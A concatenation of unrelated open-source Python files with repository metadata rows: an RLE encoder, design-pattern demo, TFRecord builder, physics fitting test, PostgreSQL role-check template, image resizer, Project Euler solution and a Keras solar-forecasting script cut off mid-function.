dcPwrSysDigIpName=dcPwrSysDigIpName, dcPwrSysCntrlrIpIndex=dcPwrSysCntrlrIpIndex, dcPwrSysDigIpTable=dcPwrSysDigIpTable, dcPwrSysCustomIpName=dcPwrSysCustomIpName, dcPwrSysRectAlrmCount=dcPwrSysRectAlrmCount, dcPwrSysCtrlAlrmName=dcPwrSysCtrlAlrmName, dcPwrSysTempAlrmIndex=dcPwrSysTempAlrmIndex, dcPwrSysMinorAlarmActiveTrap=dcPwrSysMinorAlarmActiveTrap, dcPwrSysCustomAlrmTable=dcPwrSysCustomAlrmTable, dcPwrSysTimerIpCount=dcPwrSysTimerIpCount, dcPwrSysPhoneNumber=dcPwrSysPhoneNumber, dcPwrSysAlarmClearedTrap=dcPwrSysAlarmClearedTrap)
| [
"dcwangmit01@gmail.com"
] | dcwangmit01@gmail.com |
b31321ac3e23c0e48f3a65038b6c320737c09e3f | e62fdc5a601741eb858aed6ffe056e6ac708e081 | /week1/rle.py | 0c6aa7a9b08e5f89d849387dd223edcd1ea89c45 | [] | no_license | MathuraMG/learning-machine | c589556d6400b51557f9f54e6884998b3093d24d | 71bb7d44900af131fa28cd5f051fd98040f325f3 | refs/heads/master | 2020-04-05T22:56:34.485343 | 2017-01-05T15:07:23 | 2017-01-05T15:07:23 | 68,153,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,136 | py | from __future__ import print_function
global_output = []  # NOTE(review): appears unused anywhere in this file — confirm before removing
def encode(input):
    """Run-length encode *input*, print the result, then decode it back.

    Example: "aaabbc" encodes to "3a2b1c".  Prints the encoded form and the
    decoded round-trip (matching the original script's interactive output),
    and additionally returns the encoded string so callers can use it
    programmatically.

    BUG FIX: the original indexed ``input[1]`` before the loop, which raised
    IndexError for inputs shorter than two characters; empty and single-char
    inputs are now handled.
    """
    # Build a list of [char, run_length] pairs in a single pass.
    runs = []
    for ch in input:
        if runs and runs[-1][0] == ch:
            runs[-1][1] += 1        # extend the current run
        else:
            runs.append([ch, 1])    # start a new run
    encoded = ''.join('%d%s' % (count, ch) for ch, count in runs)
    print('The encoded output is - ', end='')
    print(encoded)
    print('\n\n********************************************\ndecoding\n\n')
    # Reconstruct the original string by repeating each run's character.
    decoded = ''.join(ch * count for ch, count in runs)
    print('The decoded input is - ', end='')
    print(decoded)
    return encoded
def main():
    """Interactively read strings and run-length encode them until 'exit'.

    BUG FIX: the original called ``raw_input``, which does not exist on
    Python 3 even though the file imports ``print_function`` for py3
    compatibility; we now fall back to ``input`` when ``raw_input`` is
    missing.
    """
    try:
        read_line = raw_input  # Python 2
    except NameError:
        read_line = input      # Python 3
    while True:
        print('\n\n********************************************\ntype exit to leave program\n\n')
        input_string = read_line("enter input : ")
        if input_string == 'exit':
            break
        print('\n\n')
        encode(input_string)


if __name__ == "__main__":
    main()
| [
"mmg9291@gmail.com"
] | mmg9291@gmail.com |
96e39bd588f9626dd6b4e0636638a73b71de9323 | 4b4154d96ec6c91ac6c1cd1b87549ab76b8aee90 | /1-design-patterns/behavioral/strategy/strategy_1.py | c4f9eda359393ffbd6f67cfe042f8004567975ad | [] | no_license | ivanhumenyuk/design-paterns | da36c6258c6369064c2a956c4e97115b85e0af56 | c518958cb351d1f4030018a0720205d887d8e74e | refs/heads/master | 2023-02-19T00:31:12.109044 | 2021-01-18T11:18:04 | 2021-01-18T11:18:04 | 322,827,455 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 896 | py | from abc import ABC, abstractmethod
class SalesSystem(ABC):
    """Strategy interface: each concrete sales system defines a discount policy."""

    @abstractmethod
    def discount(self, amount: float):
        """Return *amount* with this system's discount applied."""
class BaseSalesSystem(SalesSystem):
    """Entry-level tier: charges 92% of the list price (8% discount)."""

    def discount(self, amount: float):
        # Apply the base-tier multiplier.
        return 0.92 * amount
class GoldSalesSystem(SalesSystem):
    """Gold tier: charges 75% of the list price (25% discount)."""

    def discount(self, amount: float):
        # Apply the gold-tier multiplier.
        return 0.75 * amount
class PremiumSalesSystem(SalesSystem):
    """Premium tier: charges 80% of the list price (20% discount)."""

    def discount(self, amount: float):
        # Apply the premium-tier multiplier.
        return 0.8 * amount
class NextYearSubscription:
    """Subscription bill that delegates discounting to a strategy object."""

    def __init__(self, sale: SalesSystem):
        # The chosen discount strategy and the price it will be applied to.
        self.sale = sale
        self.price = 0

    def set_price(self, price):
        """Record the pre-discount subscription price."""
        self.price = price

    def calculate_discount(self):
        """Return a human-readable string with the discounted price."""
        discounted = self.sale.discount(self.price)
        return 'Discount is {}'.format(discounted)
if __name__ == '__main__':
    # Demo: price a base-tier (8% discount) client at 1000 and print the result.
    base_client = NextYearSubscription(BaseSalesSystem())
    base_client.set_price(1000)
    print(base_client.calculate_discount())
| [
"vanya19960529@gmail.com"
] | vanya19960529@gmail.com |
c8a7032f68913beb07d201079216842e34ee9eeb | 0abbaa3db2361d8dde8d701c9e6f67533aad287a | /Garbage/pi.py | 0ebb6aa5d1fb500e3dbacda6a21f85ae6a90b79f | [] | no_license | ducochapelle/CodeJam | bff72d6952e92453922b7f79970cfb89eb80b29c | fee3c643c87ea410b0b9bf6e81da2265b290efd8 | refs/heads/master | 2021-01-10T12:21:00.398240 | 2015-12-09T19:36:42 | 2015-12-09T19:36:42 | 47,709,383 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | # print pi to the 5th decimal
# given pi = 4(1/1-1/3+1/5-1/7...)  (Leibniz series)
pseudo_pi = 1
sum_fract = 0
bottom = 1.0
sign = 1
# BUG FIX: the original condition used "is not", which compares object
# identity rather than value, so the loop never terminated.  Use != to
# compare the rounded approximation against 3.14159 by value.
while round(pseudo_pi, 5) != 3.14159:
    sum_fract += sign / bottom   # add the next series term
    bottom += 2                  # next odd denominator
    sign *= -1                   # terms alternate in sign
    pseudo_pi = 4 * sum_fract
# BUG FIX: the original used the Python 2 print statement; print the final
# approximation and denominator once, after convergence.
print(pseudo_pi, bottom)
| [
"duco.chapelle@gmail.com"
] | duco.chapelle@gmail.com |
373f495680899101324afcd14270ec1573dec5d3 | 35e28f5c6d3df8c3478f883795a3643881ad71ba | /USG/items.py | dd5ff1735fa2fe2fb05edde1e4eb092069c1b05a | [] | no_license | ajayvjn/USG-WebScrapper | 628cc30e8b6dbac33b9ab36228c1bd72629e98e0 | 093b3e4a1ca8f04f4ce0ca5f574e1275fe2d8a05 | refs/heads/master | 2020-05-20T12:26:08.521352 | 2017-01-30T21:09:25 | 2017-01-30T21:09:25 | 80,463,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class UsgItem(scrapy.Item):
    """Scraped item holding a single crawled URL.

    Fields are declared per the Scrapy item model; see
    http://doc.scrapy.org/en/latest/topics/items.html
    """

    # The page URL captured by the spider.
    url = scrapy.Field()
| [
"ajay.vjn17@gmail.com"
] | ajay.vjn17@gmail.com |
613351e89d22dfa1cec4cfad9beb9fa751759990 | b1b685a1dc5245845b8f419023241c22ca4bf749 | /wikidocs/28-class.py | 4c6003c76d19e09df17fc35bcdfad0aa33db8f96 | [] | no_license | gimslab/python-exam | 040e7202d255e64167c0e0352893707d2d281a2b | 0144073690cd938324b88cf9b46054f5ce69840c | refs/heads/master | 2016-09-06T07:54:00.411019 | 2015-10-11T08:27:07 | 2015-10-11T08:27:07 | 42,339,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | class Calculator:
    def __init__(self):
        """Start a new calculator with an empty running total."""
        self.result = 0
def adder(self, num):
self.result += num
return self.result
# Demo: two independent calculators, each keeping its own running total.
# (Removed the stray trailing semicolons from the original.)
cal1 = Calculator()
cal2 = Calculator()
print(cal1.adder(3))  # 3
print(cal1.adder(2))  # 5
print(cal2.adder(4))  # 4
print(cal2.adder(3))  # 7
print(cal1.result)  # 5
print(cal2.result)  # 7
| [
"gimslab.com@gmail.com"
] | gimslab.com@gmail.com |
f51f822cd04bc5b1f4cd7cd1c075196b0aaec60a | 4b848709353abd6c628c84f6da084adff133a5c6 | /Server Files/subprocesses/streaming.py | 73bab1d2c12917293abe5361ec53c45b499145db | [] | no_license | DasSpecMaker/Doorbell | b03d72e50dd483291a82408818355827c5f5bf50 | 08227dcc80c4fa61023bea45fdbc13a8bf7410fa | refs/heads/master | 2021-01-06T03:28:50.241654 | 2020-03-31T01:10:55 | 2020-03-31T01:10:55 | 241,210,991 | 0 | 0 | null | 2020-02-17T21:24:20 | 2020-02-17T21:24:19 | null | UTF-8 | Python | false | false | 1,895 | py | import socket
import time
import picamera
import struct
from PIL import Image
import io
import datetime
import sys
import signal
#from subprocess import STDOUT, PIPE
# Start a socket listening for connections on 0.0.0.0:8000 (0.0.0.0 means
# all network interfaces on this host).
server_socket = socket.socket()
#port = sys.argv[1]
#print(port)
server_socket.bind(('0.0.0.0', 8000))
server_socket.listen(2)  # allow a small backlog of pending connections
cont = True   # NOTE(review): appears unused in this file — confirm before removing
pic = False   # set to True by the SIGUSR1 handler to request a snapshot
def handleSnapshotSignal(signalNumber, frame):
    """SIGUSR1 handler: request a snapshot from the capture loop.

    Sets the module-level ``pic`` flag, which the recording loop in
    ``__main__`` polls and clears after taking the picture.
    (Cleanup: removed a stray semicolon, dead commented-out code, and a
    redundant bare ``return``.)
    """
    print('received user defined signal')
    global pic
    pic = True
def handleExit(signalNumber, frame):
    """SIGTERM handler: close the connection and listening socket, then exit.

    Relies on the module-level ``connection`` and ``server_socket`` created
    in the ``__main__`` block.  ``sys.exit()`` raises SystemExit to unwind
    the recording loop.  (Cleanup: removed stray semicolons and a redundant
    bare ``return``.)
    """
    print('received exit')
    connection.close()
    server_socket.close()
    sys.exit()
class StreamingOutput(object):
    """File-like sink that forwards camera frames to a socket makefile."""

    def __init__(self, sockmakefile):
        # Underlying writable binary file object (e.g. socket.makefile('wb')).
        self.makefile = sockmakefile

    def write(self, buf):
        # BUG FIX: propagate the byte count from the underlying write; the
        # file-object protocol expects write() to return the number of bytes
        # written, and the original discarded it.
        return self.makefile.write(buf)
if __name__ == '__main__':
    # Install the snapshot (SIGUSR1) and shutdown (SIGTERM) handlers.
    signal.signal(signal.SIGUSR1, handleSnapshotSignal)
    signal.signal(signal.SIGTERM, handleExit)
    # Accept a single connection and expose the socket as a writable file.
    connection, addr = server_socket.accept()
    makefile = connection.makefile('wb')
    try:
        camera = picamera.PiCamera()
        camera.resolution = (240, 180)
        camera.framerate = 24
        output = StreamingOutput(makefile)
        camera.start_recording(output, format='h264')
        while True:
            camera.wait_recording(1)
            if pic:
                # SIGUSR1 asked for a snapshot: grab a still frame without
                # interrupting the H.264 stream, then clear the request flag
                # set by the signal handler.
                camera.capture('foo.jpg', use_video_port=True)
                pic = False
    except Exception:
        # BUG FIX: the original bare "except:" also swallowed the SystemExit
        # raised by the SIGTERM handler (handleExit), preventing shutdown.
        # Catching Exception lets SystemExit propagate while still handling
        # camera/socket errors.  (Also removed the unused ``str1`` variable,
        # leftover debug prints, and the duplicate close calls here — the
        # ``finally`` block below performs the cleanup in every case.)
        print("ERROR: Closing server")
    finally:
        print("closing server")
        connection.close()
        server_socket.close()
| [
"ngo.victor20@gmail.com"
] | ngo.victor20@gmail.com |
265d01952ab7506e909f20767daaeac5d52864e4 | 4ce2cff60ddbb9a3b6fc2850187c86f866091b13 | /tfrecords/src/wai/tfrecords/object_detection/dataset_tools/create_oid_tf_record.py | 271fd0aac175d399dda9b528a9a311145f48cfc1 | [
"MIT",
"Apache-2.0"
] | permissive | 8176135/tensorflow | 18cb8a0432ab2a0ea5bacd03309e647f39cb9dd0 | 2c3b4b1d66a80537f3e277d75ec1d4b43e894bf1 | refs/heads/master | 2020-11-26T05:00:56.213093 | 2019-12-19T08:13:44 | 2019-12-19T08:13:44 | 228,970,478 | 0 | 0 | null | 2019-12-19T03:51:38 | 2019-12-19T03:51:37 | null | UTF-8 | Python | false | false | 5,240 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Creates TFRecords of Open Images dataset for object detection.
Example usage:
python object_detection/dataset_tools/create_oid_tf_record.py \
--input_box_annotations_csv=/path/to/input/annotations-human-bbox.csv \
--input_image_label_annotations_csv=/path/to/input/annotations-label.csv \
--input_images_directory=/path/to/input/image_pixels_directory \
--input_label_map=/path/to/input/labels_bbox_545.labelmap \
--output_tf_record_path_prefix=/path/to/output/prefix.tfrecord
CSVs with bounding box annotations and image metadata (including the image URLs)
can be downloaded from the Open Images GitHub repository:
https://github.com/openimages/dataset
This script will include every image found in the input_images_directory in the
output TFRecord, even if the image has no corresponding bounding box annotations
in the input_annotations_csv. If input_image_label_annotations_csv is specified,
it will add image-level labels as well. Note that the information of whether a
label is positivelly or negativelly verified is NOT added to tfrecord.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import contextlib2
import pandas as pd
import tensorflow as tf
from wai.tfrecords.object_detection.dataset_tools import oid_tfrecord_creation
from wai.tfrecords.object_detection.dataset_tools import tf_record_creation_util
from wai.tfrecords.object_detection.utils import label_map_util
# Command-line flags. Only num_shards has a usable default; the others are
# checked as required inside main().
tf.flags.DEFINE_string('input_box_annotations_csv', None,
                       'Path to CSV containing image bounding box annotations')
tf.flags.DEFINE_string('input_images_directory', None,
                       'Directory containing the image pixels '
                       'downloaded from the OpenImages GitHub repository.')
tf.flags.DEFINE_string('input_image_label_annotations_csv', None,
                       'Path to CSV containing image-level labels annotations')
tf.flags.DEFINE_string('input_label_map', None, 'Path to the label map proto')
tf.flags.DEFINE_string(
    'output_tf_record_path_prefix', None,
    'Path to the output TFRecord. The shard index and the number of shards '
    'will be appended for each output shard.')
tf.flags.DEFINE_integer('num_shards', 100, 'Number of TFRecord shards')
FLAGS = tf.flags.FLAGS
def main(_):
  """Converts Open Images annotations plus on-disk images into sharded TFRecords."""
  tf.logging.set_verbosity(tf.logging.INFO)

  # Fail fast if any mandatory flag is missing.
  required_flags = [
      'input_box_annotations_csv', 'input_images_directory', 'input_label_map',
      'output_tf_record_path_prefix'
  ]
  for flag_name in required_flags:
    if not getattr(FLAGS, flag_name):
      raise ValueError('Flag --{} is required'.format(flag_name))

  label_map = label_map_util.get_label_map_dict(FLAGS.input_label_map)
  all_box_annotations = pd.read_csv(FLAGS.input_box_annotations_csv)
  if FLAGS.input_image_label_annotations_csv:
    all_label_annotations = pd.read_csv(FLAGS.input_image_label_annotations_csv)
    # Rename so image-level confidence does not clash with box-level 'Confidence'.
    all_label_annotations.rename(
        columns={'Confidence': 'ConfidenceImageLabel'}, inplace=True)
  else:
    all_label_annotations = None
  # Every image present on disk is included, even without annotations.
  all_images = tf.gfile.Glob(
      os.path.join(FLAGS.input_images_directory, '*.jpg'))
  all_image_ids = [os.path.splitext(os.path.basename(v))[0] for v in all_images]
  all_image_ids = pd.DataFrame({'ImageID': all_image_ids})
  # pd.concat drops None entries, so a missing label frame is harmless here.
  all_annotations = pd.concat(
      [all_box_annotations, all_image_ids, all_label_annotations])

  tf.logging.log(tf.logging.INFO, 'Found %d images...', len(all_image_ids))

  # ExitStack keeps all shard writers open for the duration of the loop and
  # closes them together on exit.
  with contextlib2.ExitStack() as tf_record_close_stack:
    output_tfrecords = tf_record_creation_util.open_sharded_output_tfrecords(
        tf_record_close_stack, FLAGS.output_tf_record_path_prefix,
        FLAGS.num_shards)
    for counter, image_data in enumerate(all_annotations.groupby('ImageID')):
      tf.logging.log_every_n(tf.logging.INFO, 'Processed %d images...', 1000,
                             counter)
      image_id, image_annotations = image_data
      # In OID image file names are formed by appending ".jpg" to the image ID.
      image_path = os.path.join(FLAGS.input_images_directory, image_id + '.jpg')
      with tf.gfile.Open(image_path) as image_file:
        encoded_image = image_file.read()
      tf_example = oid_tfrecord_creation.tf_example_from_annotations_data_frame(
          image_annotations, label_map, encoded_image)
      # presumably falsy when the frame has nothing usable for this image - the
      # guard below skips writing in that case
      if tf_example:
        # Image IDs are hex strings, so int(id, 16) spreads them across shards.
        shard_idx = int(image_id, 16) % FLAGS.num_shards
        output_tfrecords[shard_idx].write(tf_example.SerializeToString())


if __name__ == '__main__':
  tf.app.run()
| [
"coreytsterling@gmail.com"
] | coreytsterling@gmail.com |
5d0a2f7e05ee7c3731f9b7550e0d5d9f8625cb88 | 78c08cd3ef66836b44373280a333c040ccb99605 | /ostap/fitting/tests/test_fitting_convolution.py | 3f980fbf093211f18849b15254d2f25697d8e7a7 | [
"BSD-3-Clause"
] | permissive | Pro100Tema/ostap | 11ccbc546068e65aacac5ddd646c7550086140a7 | 1765304fce43714e1f51dfe03be0daa5aa5d490f | refs/heads/master | 2023-02-24T08:46:07.532663 | 2020-01-27T13:46:30 | 2020-01-27T13:46:30 | 200,378,716 | 0 | 0 | BSD-3-Clause | 2019-08-03T13:28:08 | 2019-08-03T13:28:07 | null | UTF-8 | Python | false | false | 3,426 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# Copyright (c) Ostap developers.
# =============================================================================
# @file test_fitting_convolution.py
# Test module for ostap/fitting/convolution.py
# =============================================================================
""" Test module for ostap/fitting/convolution.py
"""
# =============================================================================
__author__ = "Ostap developers"
__all__ = () ## nothing to import
# =============================================================================
import ROOT, random
import ostap.fitting.roofit
import ostap.fitting.models as Models
from ostap.core.core import cpp, VE, dsID
from ostap.logger.utils import rooSilent
# =============================================================================
# logging
# =============================================================================
from ostap.logger.logger import getLogger
# Use a dedicated logger name when run as a script, the module name otherwise.
if '__main__' == __name__ or '__builtin__' == __name__ :
    logger = getLogger ( 'test_fitting_convolution' )
else :
    logger = getLogger ( __name__ )
# =============================================================================
## the observable shared by every PDF below, and a registry of built models
x = ROOT.RooRealVar ( 'x', 'test' , 1 , 10 )
models = set()
# =============================================================================
## Asymmetric Laplace
# =============================================================================
def test_laplace():
    """Build an asymmetric Laplace PDF plus two convolved (smeared) variants."""
    logger.info ('Test Asymmetric Laplace shape' )

    from ostap.fitting.convolution import Convolution_pdf
    from ostap.fitting.resolution import ResoApo2

    # plain asymmetric Laplace shape
    base = Models.AsymmetricLaplace_pdf(name='AL',
                                        xvar=x,
                                        mean=5,
                                        slope=1)
    # convolved with a constant (Gaussian) resolution of 0.75
    smeared_const = Convolution_pdf(name='L1', pdf=base, resolution=0.75)
    # convolved with an explicit resolution PDF
    reso = ResoApo2('A', x, 0.75)
    smeared_pdf = Convolution_pdf(name='L2', pdf=base, resolution=reso)

    base.draw(silent=True)
    smeared_const.draw(silent=True)
    smeared_pdf.draw()

    # register everything for the serialization check in test_db()
    for pdf in (base, smeared_const, smeared_pdf):
        models.add(pdf)
# =============================================================================
## check that everything is serializable
# =============================================================================
def test_db():
    """Verify every model built above survives a round trip into a ZipShelve DB."""
    logger.info('Saving all objects into DBASE')
    import ostap.io.zipshelve as DBASE
    from ostap.utils.timing import timing
    with timing(name='Save everything to DBASE'), DBASE.tmpdb() as database:
        database['models'] = models
        database.ls()
# =============================================================================
if '__main__' == __name__ :
    test_laplace () ## Laplace-function + background
    ## finally check that everything is serializable:
    test_db ()
# =============================================================================
# The END
# =============================================================================
| [
"Ivan.Belyaev@cern.ch"
] | Ivan.Belyaev@cern.ch |
1c756ee1722315d82f7d75aa98100a4ec775b5fa | e66ef5811180b0692cedb171a97991bb046bde33 | /templates/postgresql.py.j2 | 0a52fe8514d8c592c4c341847f08a0c7c96fd397 | [
"MIT"
] | permissive | MartinHell/ansible-dgc-common | 3b8b8f6dfd25966fab797f806c4c71487e52d3eb | 67fec6d456f688f91d27c0fb6c00f7faccd53af5 | refs/heads/master | 2022-02-24T05:24:56.006179 | 2019-09-20T08:37:19 | 2019-09-20T08:37:19 | 114,650,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | j2 | #!/usr/bin/env python
import psycopg2
import sys
# repmgr role probe (rendered from a Jinja2 template by Ansible, which fills
# the {{ ... }} placeholders). Exits 0 when the node's actual role matches the
# role passed as argv[1] ('master' or 'slave'), 2 otherwise - Nagios-style codes.
try:
    conn = psycopg2.connect("dbname='{{ repmgr_db_name }}' user='{{ repmgr_db_user }}' host='localhost' password='{{ repmgr_db_password }}' connect_timeout=1")
except:
    # any connection failure (auth, timeout, ...) is reported as CRITICAL
    sys.stdout.write("Unable to connect to the database\n")
    sys.exit(2)
cur = conn.cursor()
cur.execute("""SELECT pg_is_in_recovery()""")
rows = cur.fetchall()
# pg_is_in_recovery() yields one boolean row: False on a primary, True on a
# standby. The repr() trick inspects the tuple's text form, e.g. "(False,)".
if "False" in repr(rows[0]):
    # node is a primary ("Active")
    if sys.argv[1] == 'master':
        sys.stdout.write("Active\n")
        sys.exit(0)
    sys.stdout.write("Active\n")
    sys.exit(2)
# only reached when the node is in recovery, i.e. a standby;
# len(rows) > 0 always holds here since the query returned a row
if len(rows) > 0:
    if sys.argv[1] == 'slave':
        sys.stdout.write("Standby\n")
        sys.exit(0)
    sys.stdout.write("Standby\n")
    sys.exit(2)
| [
"martin.hellstrom@dgc.se"
] | martin.hellstrom@dgc.se |
ddc044cb1da3ccffcbc308251dd875a60f2600f4 | 54083370977a61521548f8b7b914ee15cc8c0330 | /training_data_gen/resize.py | de1f2df08810024b5ede522599b11d0331fc74c4 | [] | no_license | ravindranyk/captcha_cracker | 814e8813f2139d98c725da6b9691e0f612ce3fcf | 66eff7738ea1f5dbd36052a16cd2b932f1bb8bbf | refs/heads/master | 2021-01-23T07:50:28.080650 | 2017-04-02T10:33:12 | 2017-04-02T10:33:12 | 86,423,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | from PIL import Image
from resizeimage import resizeimage
import glob
def resize_file(in_file, out_file, size):
    """Resize the image at `in_file` to `size` (width, height) and save to `out_file`.

    Fixes over the original: the explicit fd.close() inside the `with` block
    was a redundant double close (the context manager already closes the
    source image), and Image.ANTIALIAS was removed in Pillow 10 - LANCZOS is
    the same filter under its current name.
    """
    new_width, new_height = size
    with Image.open(in_file) as img:
        resized = img.resize((new_width, new_height), Image.LANCZOS)
        resized.save(out_file)
# Resize every training image in place to the fixed 200x50 input size.
for filename in glob.glob('dataset_1l_java/*.jpg'):
    resize_file(filename, filename, (200, 50))
| [
"ravindranyk707@gmail.com"
] | ravindranyk707@gmail.com |
db5c3f8c6618635864e14b710fcc54c82f8e4fd1 | 4697065fedc3df947b50e443d477ea492d32c379 | /Text_Analyzer_SoloLearn/Example_solo.py | bb21b568c51b70abe42736b89f373337f409382a | [] | no_license | Maryam-ask/Python_Tutorial | 3db7fdb2020c1b476d501ccb2e34e1ac3f3b80ae | dc589ee4c0faf1fb384659498b69ac1c9dbb8de4 | refs/heads/master | 2023-06-22T17:09:50.432282 | 2021-07-19T10:51:19 | 2021-07-19T10:51:19 | 387,431,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | """
Longest Word:
Given a text as input, find and output the longest word.
Sample Input
this is an awesome text
Sample Output
awesome
"""
def count_char(txt):
    """Return the number of characters in `txt`.

    The original re-implemented len() with a manual while-loop counter;
    the built-in len() is O(1) and behaviorally identical.
    """
    return len(txt)
# Read a line of text and print its longest word (first one wins on ties).
text = input("Enter your text: ")
txt_list = text.split(" ")
bigger_word = txt_list[0]
for i in range(1, len(txt_list)):
    # keep the current candidate unless a strictly longer word appears
    if count_char(bigger_word) < count_char(txt_list[i]):
        bigger_word = txt_list[i]
print(bigger_word)
| [
"maryamaskari19@gmail.com"
] | maryamaskari19@gmail.com |
3a8fe495d062bc57cac1944bc5cfc45f1bf25ac7 | 571b57a3f059a2d9ea78f47aa695c8f3327746f5 | /08.py | 5a1cd895822275733ede409e3fac3cb23f1338df | [] | no_license | pixma500/hello-world | 0bb09c432693ad5f294ef4326dd18d89b90e1201 | ab9cf7813d085624f26bb572d1c9dabfb98441f2 | refs/heads/master | 2022-12-07T04:55:26.483765 | 2020-08-21T04:48:44 | 2020-08-21T04:48:44 | 263,539,911 | 0 | 0 | null | 2020-05-13T06:21:52 | 2020-05-13T06:04:25 | null | UTF-8 | Python | false | false | 1,193 | py | import time
import math
import time

# Project Euler #8: greatest product of 13 adjacent digits of the
# 1000-digit number below.
d='7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
f = list(str(d))  # individual digit characters
r = len(f)
WINDOW = 13
digits = [int(ch) for ch in f]
# Fix: valid window start indices run up to r - WINDOW inclusive, i.e.
# range(r - WINDOW + 1); the original range(0, r - 13) skipped the final
# window. math.prod replaces the manual s *= ... accumulator.
w = 0
for i in range(r - WINDOW + 1):
    w = max(w, math.prod(digits[i:i + WINDOW]))
print(w)
# time.clock() was removed in Python 3.8; perf_counter() is its replacement.
print(time.perf_counter())
| [
"svidinoff@mail.ru"
] | svidinoff@mail.ru |
f66e5ca5bccba463ba1c7ea0e178e85c4982a93f | 3e5ecad4d2f681f2f4f749109cc99deea1209ea4 | /Dacon/solar1/test04_solar9.py | 0f9e499e4f86263fff68de5a667aeda9b729cb92 | [] | no_license | SunghoonSeok/Study | f41ede390079037b2090e6df20e5fb38f2e59b8f | 50f02b9c9bac904cd4f6923b41efabe524ff3d8a | refs/heads/master | 2023-06-18T06:47:55.545323 | 2021-07-05T00:47:55 | 2021-07-05T00:47:55 | 324,866,762 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,798 | py | # 7일의 데이터로 2일의 target값 구하기
# 시간별로 데이터를 나눠서 훈련
import numpy as np
import pandas as pd
import tensorflow.keras.backend as K
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import Dense, Input, LSTM, Dropout, Conv1D, Flatten, MaxPooling1D, GRU, SimpleRNN
from tensorflow.keras.backend import mean, maximum
# 필요 함수 정의
# GHI추가
def Add_features(data):
data['cos'] = np.cos(np.pi/2 - np.abs(data['Hour']%12 - 6)/6*np.pi/2)
data.insert(1,'GHI',data['DNI']*data['cos']+data['DHI'])
data.drop(['cos'], axis= 1, inplace = True)
return data
# 데이터 몇일씩 자르는 함수
def split_x(data, size):
x = []
for i in range(len(data)-size+1):
subset = data[i : (i+size)]
x.append([item for item in subset])
print(type(x))
return np.array(x)
# Pinball (quantile) loss helpers for the Keras models.
def quantile_loss(q, y_true, y_pred):
    """Pinball loss at quantile level q, averaged over the last axis.

    Under-prediction is penalized by q and over-prediction by (1 - q);
    operates on Keras backend tensors.
    """
    err = (y_true - y_pred)
    return K.mean(K.maximum(q*err, (q-1)*err), axis=-1)
# the nine quantile levels a separate model is trained for
quantiles = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
# Keep only the seven feature columns used for training.
def preprocess_data(data):
    """Add the GHI feature, then return a frame restricted to the 7 model inputs."""
    enriched = Add_features(data)
    frame = enriched.copy()
    frame = frame[['GHI', 'DHI', 'DNI', 'WS', 'RH', 'T', 'TARGET']]
    return frame.iloc[:, :]
# Model definition: a Conv1D stack.
def DaconModel():
    """Build the Conv1D regression network used for one (hour, quantile, day) slot.

    Input windows have shape (7 timesteps, 7 features); the output is a single
    scalar prediction. Compilation happens later in only_compile().
    """
    model = Sequential()
    model.add(Conv1D(256,2, padding='same', input_shape=(7, 7),activation='relu'))
    model.add(Conv1D(128,2, padding='same',activation='relu'))
    model.add(Conv1D(64,2, padding='same',activation='relu'))
    model.add(Conv1D(32,2, padding='same',activation='relu'))
    model.add(Flatten())
    model.add(Dense(64,activation='relu'))
    model.add(Dense(32,activation='relu'))
    model.add(Dense(16,activation='relu'))
    model.add(Dense(8,activation='relu'))
    model.add(Dense(1))
    return model
# optimizer 불러오기
from tensorflow.keras.optimizers import Adam, Adadelta, Adamax, Adagrad
from tensorflow.keras.optimizers import RMSprop, SGD, Nadam
# Compile-and-train helper. The optimizer is created inside the loop so the
# learning rate restarts at 0.002 for every quantile - creating it outside the
# for-loop would let the ReduceLROnPlateau decay leak across quantiles.
# In total 48 (hours) * 9 (quantiles) * 2 (Day7/Day8) checkpoint files are made.
def only_compile(a, x_train, y_train, x_val, y_val):
    """Train one model per quantile for the current hour slot.

    a: 0 for the Day-7 target, 1 for the Day-8 target (only used in the
    checkpoint file name). Relies on module-level globals: `i` (hour index of
    the enclosing loop), `epochs`, `bs`, `es`, `lr` (ReduceLROnPlateau) and
    `quantiles` - fragile coupling, but kept as designed.
    """
    for q in quantiles:
        print('Day'+str(i)+' ' +str(q)+'실행중입니다.')
        model = DaconModel()
        optimizer = Adam(lr=0.002)
        # loss and metric are both the pinball loss at quantile q
        model.compile(loss = lambda y_true,y_pred: quantile_loss(q,y_true,y_pred), optimizer = optimizer, metrics = [lambda y,y_pred: quantile_loss(q,y,y_pred)])
        filepath = f'c:/data/test/solar/checkpoint/solar_checkpoint5_time{i}-{a}-{q}.hdf5'
